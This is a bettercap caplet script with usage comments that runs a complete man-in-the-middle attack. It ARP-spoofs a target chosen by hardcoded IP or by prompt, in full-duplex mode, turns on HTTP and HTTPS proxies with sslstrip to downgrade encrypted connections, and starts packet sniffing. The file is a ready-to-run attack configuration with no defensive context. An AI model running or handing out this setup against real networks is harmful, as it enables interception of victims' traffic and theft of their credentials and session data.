# USAGE: bettercap -caplet sniff.cap    (make sure you are in the current dir, or enter full path)

# Hardcode a target.  Uncomment only if you comment out the dynamic setting, below
#set arp.spoof.targets 192.168.0.172

# Dynamically ask user for a target.  Comment out if you uncomment out the hardcoded setting, above.
read arp.spoof.targets Select the target to spoof:

set arp.spoof.fullduplex true
set http.proxy.sslstrip true
set https.proxy.sslstrip true
set net.sniff.verbose false
events.ignore net.sniff.mdns
events.ignore endpoint.new
events.ignore endpoint.lost
arp.spoof on
http.proxy on
net.sniff on
